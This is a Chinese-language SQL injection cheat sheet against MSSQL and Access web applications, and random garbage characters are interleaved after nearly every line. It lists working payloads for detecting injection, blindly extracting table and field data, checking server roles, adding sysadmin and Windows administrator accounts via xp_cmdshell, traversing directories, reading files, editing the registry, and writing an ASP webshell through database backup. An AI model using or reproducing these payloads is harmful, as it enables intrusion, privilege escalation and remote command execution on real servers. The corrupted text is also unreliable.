1.判断是否有注入;and 1=1 ;and 1=2 �t/}�NX[q�
2.初步判断是否是mssql ;and user>0 j^7A�}��fz
^)wKS]BQ..
3.注入参数是字符'and [查询条件] and ''=' 41�x"Q?.bY
/O5&�)%N��
4.搜索时没过滤参数的'and [查询条件] and '%25'=' e�P�,bF�c�
�Qt�w�QVOK
5.判断数据库系统 �pI:,Lt1�B
.faf!3��d
;and (select count(*) from sysobjects)>0 mssql Y
h�Q)�M�5
ruQt0q,W3%
;and (select count(*) from msysobjects)>0 access �8�qqN0"{,
�
vTgx7�gP
x_�/}R�3�d
n1JtY75#,/
6.猜数据库 ;and (select Count(*) from [数据库名])>0 j*5IRzK1%0
�$�&=�xw _
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �8P�zGUn;\
��j.u�c�v�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 q�i����B~�
@)BO`;*$fF
9.(1)猜字段的ascii值(access) j�Q,Vs=*H�
zs�~T����u
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ^$5����0�[
5Yh�cnwdm!
(2)猜字段的ascii值(mssql) LQHL4j�RXU
{O��9(<��g
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Z6rhI�nI�Y
@�zC6��`�
10.测试权限结构(mssql) d�\ 8v
VZ
W&=�OtN
U!
U�rHndnq�M
+ID\u
<�?�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- [��l�g��!*
vj�q2(I)u
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �)��Xh��}N
o]~\�u{o#.
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- d)e��mTXB(
h7��E~I
J
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ~W���[��I�
~L"�$(^��/
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �8[KKi�~A�
58�Ce>�*~�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ov,|`FdU^T
�8ix_<$�%�
;and 1=(select IS_MEMBER('db_owner'));-- |)+
S�G�>-
�Bz<hP*.O�
ZRG
�Cy5Rk
>Jml��a~�A
11.添加mssql和系统的帐户 c�3���O/#*
F?|Efpzow?
;exec master.dbo.sp_addlogin username;-- *m}8L%<�HT
;exec master.dbo.sp_password null,username,password;-- X>�Vc4n�<}
��=w�!�ik9
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ~x��^y5[5{
Wk�<�fNHg�
;exec master.dbo.xp_cmdshell 'net user username password u0h%4�f!X
Td�'Mc�-/�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �RbX9PF"|+
)�"S%�'myj
;exec master.dbo.xp_cmdshell 'net user username password /add';-- I@MG��?Z�Q
�uh�h7Ft#H
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- Y�>8Q��j+d
N#K)Z5�J)b
c1�"wS*u��
&��h�0LWPl
12.(1)遍历目录 -�;7x�UNQ
�"_q~S$i�^
;create table dirs(paths varchar(100), id int) ���Sv�T0%2
�1o`1W4Q�
;insert dirs exec master.dbo.xp_dirtree 'c:\' E ?Mg�bd3�
I&{T 4.B:U
;and (select top 1 paths from dirs)>0 /)6���T>/�
���
�E.��h
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ryVYY>�*(K
b�^VR���pv
V
9�Qt;]mQ
�byxl�C?q7
(2)遍历目录 Hw� o _;fV
y�#j�7�vO�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 4<i#TCGex3
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 XI��\Slq�
�J�h���3��
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 P |t��yyjO
{ ���c#�US
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 Y(g_h:lf,]
��Z 2�N6r6
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 V�r
E�GR�$
w$:\!�FImx
[�kg?q5F�)
!0W(f.A{�K
13.mssql中的存储过程 �`NN�P<z+\
8Yh'/,o=L#
xp_regenumvalues 注册表根键, 子键 [)N��t;�|U
�J<0{�3pZY
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �9wY�m(7M6
�iT}>a30]B
xp_regread 根键,子键,键值名 &DWSf`:Hx
A0<�g�8pv�
;exec xp_regread '2.e�y33V�
nQ\`�]�_C�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 YVMv�T>/,�
Kk���8wlC�
xp_regwrite 根键,子键, 值名, 值类型, 值 Ddr.6`V�J
�z�R<���{z
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �X5�iD�<Lh
8\rca:cF
�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 p(n0(}eVC'
~6f/jCluR%
xp_regdeletevalue 根键,子键,值名 G'\[dwD,u�
yv4x.cfI2W
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 \6|y~5Hw{r
)/jDt d�I�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �gy}3ZA*�F
cy�8>M))c
dH�DtY$�/_
3gUY13C}:p
14.mssql的backup创建webshell �V
*@q< rQ
^�*}D*=�>\
use model 7Mh'�x�:p�
28"1�ONs�3
create table cmd(str image); VZi1b�0k1.
�&�V?��+Y2
insert into cmd(str) values (''); uOv<*Jld*
�KR��( apO
backup database model to disk='c:\l.asp'; PEI$1��,z
{N2GRF~c-y
@@D/&}#F��
9���
Zo�s;
15.mssql内置函数 �j\>&]0-Iq
".�>#�Qp%�
;and (select @@version)>0 获得Windows的版本号 BQ6�$��T�&
�p6- //0qb
;and user_name()='dbo' 判断当前系统的连接用户是不是sa gX{j$]^6G8
Q�#%�LIkeq
;and (select user_name())>0 爆当前系统的连接用户 B&�_:20^y~
\^(#b,k#�
;and (select db_name())>0 得到当前连接的数据库 �}rJq�MZ]w
6|EO��B~�|
i3)3.�WK^�
j��wk+��&S
16.简洁的webshell T���v|'6P
}�ekNZNcuM
use model k �M�/:�n�
0kUhz\"R:q
create table cmd(str image); &��`m.]RV
'l/l]26rO4
insert into cmd(str) values (''); &MX&5@
V�u
:�$G�^TD/n
backup database model to disk='g:\wwwtest\l.asp';
